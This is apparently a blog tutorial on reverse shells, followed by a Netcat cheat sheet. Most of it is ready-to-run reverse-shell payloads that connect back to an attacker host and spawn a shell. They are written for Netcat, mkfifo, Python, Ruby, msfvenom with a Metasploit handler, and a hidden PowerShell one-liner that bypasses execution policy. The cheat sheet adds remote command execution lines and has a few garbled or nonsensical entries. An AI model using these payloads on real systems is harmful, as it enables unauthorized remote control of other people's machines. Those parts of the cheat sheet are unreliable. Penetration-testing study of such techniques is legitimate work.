Step-by-Step: Setting Up a Reverse Shell with Netcat

5 min read1 day ago

Introduction

cybersecurity, reverse shells are a powerful tool often used by penetration testers and ethical hackers to gain remote access to a target machine. This blog will guide you through the process of setting up a reverse shell using Netcat, a versatile networking utility. By the end of this guide, you’ll have a solid understanding of how to leverage Netcat for remote access in a controlled and ethical manner.

Understanding Reverse Shells and Netcat

One kind of shell when the attacker’s machine is connected to the target machine again is called a reverse shell. This is helpful in situations where the destination computer is protected from inbound connections by a firewall or network address translator (NAT). Known as the “Swiss Army knife” of networking, Netcat is a command-line utility that utilises the TCP/IP protocol to read and write data across network connections.

Step-by-Step Guide to Setting Up a Reverse Shell with Netcat

Using Netcat

1. Netcat Simple Shell: On the attacker’s machine

nc -lvp 4444

On the target machine

nc <attacker_IP> 4444 -e /bin/bash

2. Netcat with mkfifo: On the attacker’s machine

nc -lvp 4444

The target machine

mkfifo /tmp/f; nc <attacker_IP> 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f

Using Python

On the attacker’s machine{Python 2}

nc -lvp 4444

On the target machine code

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Using MSFvenom (Metasploit)

Generate a payload:

   msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f elf > shell.elf

On the attacker’s machine:

   msfconsole
   use exploit/multi/handler
   set payload linux/x86/shell_reverse_tcp
   set LHOST <attacker_IP>
   set LPORT 4444
   exploit

On the target machine, run

   chmod +x shell.elf
   ./shell.elf

Using PowerShell

PowerShell One-Liner: On the attacker’s machine:

nc -lvp 4444

On the target machine:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<attacker_IP>",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Using Ruby

On the attacker’s machine:

 nc -lvp 4444

On the target machine:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<attacker_IP>","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Cheat Sheet

UDP Mode: Use Netcat in UDP mode for sending and receiving UDP packets. UDP is connectionless, making it suitable for applications like streaming media or DNS queries.
Listen: nc -u -l -p <port>
Send: nc -u <destination_ip> <port>

2. Banner Grabbing: Retrieve the banner information from a service running on a specific port. This can help identify the type and version of the service.

nc -v <host> <port>

3. Reverse Shell: Establish a reverse shell connection, allowing the attacker to execute commands on the victim’s system. The attacker listens for incoming connections, while the victim connects back and spawns a shell.

Attacker: nc -l -p <listening_port> -vvv

Victim (Linux): nc <attacker_ip> <listening_port> -e /bin/bash

Victim (Windows): nc <attacker_ip> <listening_port> -e cmd.exe

4. HTTP Requests: Craft and send HTTP requests using Netcat. This can be useful for testing web servers or debugging HTTP communication.

Send HTTP GET request: echo -e "GET / HTTP/1.0rnrn" | nc <host> <port>

Send custom HTTP request: echo -e "<custom_request>" | nc <host> <port>

5. File Shredding: Use Netcat to stream data to the shred command, securely deleting a file by overwriting its contents before unlinking it from the file system.

Securely delete a file: nc -l -p <port> | shred -u

6. VoIP Testing: Transmit and receive audio data over a network using Netcat. This can help test VoIP (Voice over IP) systems or streaming audio content.

Send audio data: cat audiofile.wav | nc -u <destination_ip> <port>

Receive audio data: nc -l -u -p <port> | play -t wav -

7. Listening Mode: Start Netcat in listening mode on a specific port. This mode waits for incoming connections.

nc -l -p <port>

8. Connect Mode: Connect to a specific host and port. This mode initiates a connection to the specified host.

nc <host> <port>

9. Port Forwarding: Incoming connections to the local port are redirected to the specified destination IP and port.

nc -l -p <local_port> -c "nc <destination_ip> <destination_port>"

On the client side: nc -l -p Forward connections from one port to another.

10. Port Redirection: Redirect incoming connections from one port to another locally. Netcat listens for connections on the local port and forwards them to the specified redirection port.

nc -l -p <local_port> -c "nc -l <redirection_port>"

11. File Transfer: Use Netcat to transfer files between systems. In the send command, specify the destination IP and port. In the receive command, specify the listening port to accept the file.

Send a file: nc -w 3 <destination_ip> <port> < file_to_send Receive a file: nc -l -p <port> > received_file

12. Remote Command Execution: Execute commands remotely on a target system. The sender listens for connections and executes commands, while the receiver connects and receives the command output.

Sender: nc -l -p <local_port> -e cmd.exe (Windows)

Receiver: nc <destination_ip> <local_port>

13. Port Scanning: Check for open ports on a remote host. This command performs a TCP port scan on the specified range of ports.

nc -zv <host> <start_port>-<end_port>

14. Chatting: Establish a simple chat session between the two systems. One system acts as the sender, while the other listens for incoming messages as the receiver.

Sender: nc <destination_ip> <port>

Receiver: nc -l -p <port>

15. Proxying: If you want to relay connections between two endpoints, use Netcat as a proxy server. The target IP address and port are used to route incoming connections to the local port.